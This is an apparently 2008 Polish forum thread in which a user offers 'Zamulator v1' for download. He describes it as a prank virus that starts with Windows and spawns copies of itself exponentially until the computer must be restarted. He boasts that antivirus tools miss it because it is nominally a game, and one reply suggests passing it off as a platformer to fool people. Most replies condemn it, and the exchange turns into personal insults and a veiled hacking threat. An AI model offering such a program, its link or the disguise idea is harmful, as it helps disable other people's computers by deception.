Thobby Opublikowano 25 Kwietnia 2008 Udostępnij Opublikowano 25 Kwietnia 2008 Tytuł:Zamulator v1 Gatunek:no chyba wirus :P Opis:Kiedy go zainstalujesz otworzy ci sie launcher.exe , zrobi ci sie czarny ekran i zamuli kompa tak ze trzeba bedzie zrestartowac :P. Na dodatek uruchamia się ze startem windowsa, wiec osobom które nie wiedzą jak to usunąć radze nie probowac xD. Działa w taki oto sposób: plik launcher otwiera dwa inne pliki: v1 i v2, które otwierają się na wzajem. Wyliczyłem że w ciągu pierwszej sekundy otwierają sie w sumie 40 razy, w drugiej 1600 i tak cały czas 40x więcej ;] Download: http://thobby.fm.interia.pl/Zamulator.zip Rozmiar pliku: 6,58 MB Autorzy: Programowanie: Ja Fabuła: (przygody czarnego ekranu xD) no ja Grafika: bez grafiki niestety :/ Muzyka: miała być muzyczka z GM'a , żeby jeszcze bardziej wkurzała ale nie odtwarza sie :( Screeny: jak można zrobić screen z czarnego ekranu?? poza tym nie da sie go zapisać bo trza kompa zrestarcić xP Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Nikas Opublikowano 25 Kwietnia 2008 Udostępnij Opublikowano 25 Kwietnia 2008 to jest tak: skoro robisz taki program który jeszcze się uruchamia z windowsem,to wątpie że ktoś to ściągnie xf 2/5 bo się uruchamia z systemem Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Thobby Opublikowano 25 Kwietnia 2008 Autor Udostępnij Opublikowano 25 Kwietnia 2008 No co trzeba zaprezentować pełne możliwości... a ile bys dal bez startu z windowsem? Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Snake Opublikowano 25 Kwietnia 2008 Udostępnij Opublikowano 25 Kwietnia 2008 Przerastacie mnie ;/ Nie ma to jak oceniać "wirusa". W dodatku z wagą 6.5 mb. Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Ludzix Opublikowano 25 Kwietnia 2008 Udostępnij Opublikowano 25 Kwietnia 2008 6,5MB wirus to jak gra na NES na DVD =D Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Thobby Opublikowano 25 Kwietnia 2008 Autor Udostępnij Opublikowano 25 Kwietnia 2008 Musi tyle być, w końcu to 3 a nie 1 plik *.exe... A poza tym jest niewykrywalny, w końcu teoretycznie to gra :P Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Maxius Opublikowano 25 Kwietnia 2008 Udostępnij Opublikowano 25 Kwietnia 2008 Ludzie nie ściągajcie tego i bana mu za to!( oczywiście nie bawię się w moda ) 1/500000000000000000000000000000000000000000000 Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Thobby Opublikowano 25 Kwietnia 2008 Autor Udostępnij Opublikowano 25 Kwietnia 2008 Wez z czyms takim w ogole nie wyskakuj bo nie wiem czy sie smiac czy płakać... Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
propaganja Opublikowano 25 Kwietnia 2008 Udostępnij Opublikowano 25 Kwietnia 2008 heh, super. po c*** to komu> i po c*** słac to w net? Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Exigo Opublikowano 25 Kwietnia 2008 Udostępnij Opublikowano 25 Kwietnia 2008 2.5/5 - programik wkurza, ale jest pomysłowy i zawsze można kogoś wkręcić że to fajna platformówka. :P Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Thobby Opublikowano 25 Kwietnia 2008 Autor Udostępnij Opublikowano 25 Kwietnia 2008 KubaGM, jestes wielki... jako pierwszy zrozumiales po co robilem tego wirusa... Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
murdalow Opublikowano 25 Kwietnia 2008 Udostępnij Opublikowano 25 Kwietnia 2008 denerwuje mnie jak ktoś tu daje takie syfy,powinni to od razu wywalać Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Thobby Opublikowano 25 Kwietnia 2008 Autor Udostępnij Opublikowano 25 Kwietnia 2008 twoj stary syf... Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Nikas Opublikowano 25 Kwietnia 2008 Udostępnij Opublikowano 25 Kwietnia 2008 oooo to już masz przerąbane xf murda cię zkosi... 1/5 bym wtedy dał,ja wiem po co są takie programy ale jak piszesz że to super program i w ogóle to my wiemy po co to jest i po co mamy sobie syf robić?? oO Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Harv Opublikowano 25 Kwietnia 2008 Udostępnij Opublikowano 25 Kwietnia 2008 GTFO stąd, bo mnie krew zalewa od takich... -9/9 Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Thobby Opublikowano 25 Kwietnia 2008 Autor Udostępnij Opublikowano 25 Kwietnia 2008 tyle mniej wiecej bym ci dał za twarz... Nikas, ty sie lepiej nie odzywaj bo sam masz 70% ostrzeżenia, a sądząc po twojej wypowiedzi to chyba cie rusek polskiego uczył... Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Nikas Opublikowano 25 Kwietnia 2008 Udostępnij Opublikowano 25 Kwietnia 2008 a co mają ostrzeżenia do tego? oO ps. kończę już bo się warny posypią Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Flaque Opublikowano 25 Kwietnia 2008 Udostępnij Opublikowano 25 Kwietnia 2008 Thobby, pierwszy raz w internecie, czy jak? Dałeś wirusa i dziwisz się, że wszyscy mają pretensje? I w dodatku wszystkich wyzywasz. O boże o boże bobzoeżozeboże bożębozboeżę co za kasztan(sory Panie Boże, że z małej, ale to nie było do Ciebie lol) Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Thobby Opublikowano 25 Kwietnia 2008 Autor Udostępnij Opublikowano 25 Kwietnia 2008 Gdybym powiedział ze to super gierka i by nie wiedzieli jak sobie z tym poradzić, to mogliby mieć pretensje, a to jest tylko prezentacja możliwości... Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Harv Opublikowano 25 Kwietnia 2008 Udostępnij Opublikowano 25 Kwietnia 2008 prezentacja możliwości... Zabiłeś mnie w tej chwili. WYJDŹ I NIE WRACAJ. Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Thobby Opublikowano 25 Kwietnia 2008 Autor Udostępnij Opublikowano 25 Kwietnia 2008 jeśli miało to być zrozumiałe, to ci nie wyszło Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Nikas Opublikowano 25 Kwietnia 2008 Udostępnij Opublikowano 25 Kwietnia 2008 Gdybym powiedział ze to super gierka i by nie wiedzieli jak sobie z tym poradzić, to mogliby mieć pretensje, a to jest tylko prezentacja możliwości... gdybyś tak zrobił to byś miał bana na 2 tygi pewnie xf proponuje się wziąść za poważny projekt... ooo fajnie admini czy tam modzi zrobili teraz z funkcją ;* xD Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Lord Vayaa Opublikowano 25 Kwietnia 2008 Udostępnij Opublikowano 25 Kwietnia 2008 Thobby nie radze ci przezywac gmclanowiczów, kilka osob zna mozliwosci hackniecia twojego kompa wiec uwazaj, jak murda sie zemsci to bedziesz plakac tak jak grela (chodz murda go nie hacknąl xD). Weź wyjdz z tym programem. Mi sie też nie podoba. Nie pozdrawiam LV Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Thobby Opublikowano 25 Kwietnia 2008 Autor Udostępnij Opublikowano 25 Kwietnia 2008 Skąd wy sie wzieliście?? nie (choDZ go nie hacknął), tylko (choĆ go nie hacknął)! Jasne uważaj bo mi ktoś hacknie kompa... Niech mi od razu spali chate... Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Ludzix Opublikowano 25 Kwietnia 2008 Udostępnij Opublikowano 25 Kwietnia 2008 prezentacja możliwości... miała być muzyczka z GM'a , żeby jeszcze bardziej wkurzała ale nie odtwarza sie :(To chyba tyle, jeśli chodzi o twoje możliwości. Załóż lepiej Team Studio i szukaj frajerów. :D Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Thobby Opublikowano 25 Kwietnia 2008 Autor Udostępnij Opublikowano 25 Kwietnia 2008 Mówiłem o możliwościach programu... Ty na prawde jestes taki tępy czy tylko udajesz?? Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
murdalow Opublikowano 25 Kwietnia 2008 Udostępnij Opublikowano 25 Kwietnia 2008 nie warto komentować poczynań tej istoty,która jedzie na rodzine,użytkowników a o programowaniu nie ma pojęcia,bo nie oszukujmy się gm nie ma nic wspólnego z programowaniem więc zaistnienie z gierką/programem przed kumplami to tylko w przedziale wiekowym do 15 lat Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
dziadekkleofas Opublikowano 25 Kwietnia 2008 Udostępnij Opublikowano 25 Kwietnia 2008 Profesjonaliści robią wirusy ważące po kilka kilobajtów, a ten chce wyskoczyć z czymś ważącym 6 mb... Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Thobby Opublikowano 25 Kwietnia 2008 Autor Udostępnij Opublikowano 25 Kwietnia 2008 gm nie ma nic wspólnego z programowaniem -.- Profesjonaliści robią wirusy ważące po kilka kilobajtów, a ten chce wyskoczyć z czymś ważącym 6 mb... Jak sam zauważyłeś, PROFESJONALIŚCI robią takie wirusy, a nikt kto używa game makera nie jest profesjonalistą.... Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
murdalow Opublikowano 25 Kwietnia 2008 Udostępnij Opublikowano 25 Kwietnia 2008 prawdziwy z ciebie zamulator, zamuliłeś się,bo nie potrafisz przyjąć krytyki i bezpodstawnie obrażasz ludzi,których nie znasz :sp_ike: Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Rekomendowane odpowiedzi